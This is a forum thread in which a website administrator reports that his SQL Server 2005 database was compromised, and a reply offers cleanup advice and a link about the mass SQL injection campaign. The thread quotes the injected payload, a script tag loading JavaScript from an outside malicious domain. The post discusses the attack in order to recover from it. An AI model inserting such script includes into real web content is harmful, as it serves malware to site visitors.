The new forums will be named Coin Return (based on the most recent vote)! You can check on the status and timeline of the transition to the new forums here.
The Guiding Principles and New Rules document is now in effect.
Website Emergency (SQL Server Hacked)
MagicPrime
FiresideWizardRegistered User regular
FiresideWizardRegistered User regular
Hey everyone, I am a graphic designer and web coordinator for a living. The place I'm working now I pretty much got thrown into running an old website that runs off a Windows SQL 2005 server/table. No less than 20 minutes ago one of the IT guys call me and say the website doesn't look right. I go look and low and behold a bunch of red-Xs with some text talking about a script linking to another website.
I log into the SQL management software and on any entry where there should be *.jpg there is *.<script src=http://www.nihaorr1.com/1.js></script>. This looks like a hack to me, and the puzzeling thing is the SQL server doesn't have a public IP address.
Any opinions? or information on what exactly they were trying to pull?
As of right now I think I have to go through the entire SQL server and try to find all the instances of this and remove it, any other options for me?
Like I said before, i was thrown into running this website and don't know the bits and tricks about it. Infact my first priority when getting this job was pushing for a new CMS/.Net website which we will be launching next month, so hopefully this is going to be the last time something happens and I dont know what the fuck is going on.
I log into the SQL management software and on any entry where there should be *.jpg there is *.<script src=http://www.nihaorr1.com/1.js></script>. This looks like a hack to me, and the puzzeling thing is the SQL server doesn't have a public IP address.
Any opinions? or information on what exactly they were trying to pull?
As of right now I think I have to go through the entire SQL server and try to find all the instances of this and remove it, any other options for me?
Like I said before, i was thrown into running this website and don't know the bits and tricks about it. Infact my first priority when getting this job was pushing for a new CMS/.Net website which we will be launching next month, so hopefully this is going to be the last time something happens and I dont know what the fuck is going on.
BNet • magicprime#1430 | PSN/Steam • MagicPrime | Origin • FireSideWizard
Critical Failures - Havenhold Campaign • August St. Cloud (Human Ranger)
Critical Failures - Havenhold Campaign • August St. Cloud (Human Ranger)
MagicPrime on
0
Posts
Do you have backups of the database? If you do and they aren't too old, just restore it, but unless the vulnerabilities are hunted down, it will likely happen again as whomever did it knows it is a vulnerable system.
Here's one of many pages about it: http://forums.iis.net/p/1148917/1867511.aspx
See the post near the bottom of the page (5th or so from the bottom) for details on what it's doing.
From what I'd read, it's not strictly an exploit, but it is taking advantage of some poorly sanitized code, attacking IIS/MSSQL. There's probably a lot more info out there on it since I was reading about it when it started.